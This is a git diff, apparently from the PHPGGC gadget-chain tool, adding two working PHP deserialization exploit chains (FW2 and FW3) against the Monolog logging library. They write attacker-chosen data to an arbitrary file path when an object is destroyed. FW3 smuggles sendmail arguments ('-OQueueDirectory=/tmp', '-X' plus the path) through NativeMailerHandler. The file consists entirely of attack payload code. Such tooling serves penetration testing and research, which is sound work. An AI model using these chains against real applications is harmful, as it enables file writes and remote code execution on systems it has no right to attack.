ambionics · CyanM0un · Sep 15, 2023 · Sep 15, 2023 · Sep 15, 2023 · Sep 15, 2023
diff --git a/gadgetchains/Monolog/FW/2/chain.php b/gadgetchains/Monolog/FW/2/chain.php
@@ -0,0 +1,18 @@
+<?php
+
+namespace GadgetChain\Monolog;
+
+class FW2 extends \PHPGGC\GadgetChain\FileWrite
+{
+    public static $version = '2.0.0';
+    public static $vector = '__destruct';
+    public static $author = 'CyanM0un';
+
+    public function generate(array $parameters)
+    {
+        $path = $parameters['remote_path'];
+        $data = $parameters['data'];
+
+        return new \Monolog\Handler\GroupHandler($path, $data);
+    }
+}
diff --git a/gadgetchains/Monolog/FW/2/gadgets.php b/gadgetchains/Monolog/FW/2/gadgets.php
@@ -0,0 +1,41 @@
+<?php
+
+namespace Monolog\Handler
+{
+    class DeduplicationHandler
+    {
+        protected $bufferSize = 1;
+        protected $buffer;
+        protected $deduplicationLeve=0;
+        protected $deduplicationStore;
+        protected $time=0;
+
+        public function __construct($path, $data)
+        {
+            $this->buffer = [["level"=>1,"message"=>$data,'datetime'=>new \Gelf\Message(),'level_name'=>'']];
+            $this->deduplicationStore = $path;
+        }
+    }
+
+    class GroupHandler
+    {
+        protected $handlers;
+
+        public function __construct($path, $data)
+        {
+            $this->handlers = [new DeduplicationHandler($path, $data)];
+        }
+    }
+}
+
+namespace Gelf
+{
+    class Message
+    {
+        protected $timestamp=0;
+
+        public function __construct()
+        {
+        }
+    }
+}
diff --git a/gadgetchains/Monolog/FW/3/chain.php b/gadgetchains/Monolog/FW/3/chain.php
@@ -0,0 +1,19 @@
+<?php
+
+namespace GadgetChain\Monolog;
+
+class FW3 extends \PHPGGC\GadgetChain\FileWrite
+{
+    public static $version = '2.0.0';
+    public static $vector = '__destruct';
+    public static $author = 'CyanM0un';
+    public static $information = 'requires the sendmail and may take a while to write. https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html';
+
+    public function generate(array $parameters)
+    {
+        $path = $parameters['remote_path'];
+        $data = $parameters['data'];
+
+        return new \Monolog\Handler\FingersCrossedHandler($path, $data);
+    }
+}
diff --git a/gadgetchains/Monolog/FW/3/gadgets.php b/gadgetchains/Monolog/FW/3/gadgets.php
@@ -0,0 +1,43 @@
+<?php
+
+namespace Monolog\Handler
+{
+    class FingersCrossedHandler
+    {
+        protected $passthruLevel=0;
+        protected $handler;
+        protected $buffer;
+
+        function __construct($path, $data)
+        {
+            $this->buffer = [["level"=>1]];
+            $this->handler = new NativeMailerHandler($path, $data);
+        }
+    }
+
+    class NativeMailerHandler
+    {
+        protected $level=0;
+        protected $formatter;
+        protected $contentType='text/plain';
+        protected $parameters;
+        protected $to=["[email protected]"];
+        protected $subject;
+
+        public function __construct($path, $data)
+        {
+            $this->subject = $data;
+            $this->parameters = ['-OQueueDirectory=/tmp', '-X' . $path];
+        }
+    }
+}
+
+namespace Monolog\Formatter
+{
+    class NormalizerFormatter
+    {
+        public function __construct()
+        {
+        }
+    }
+}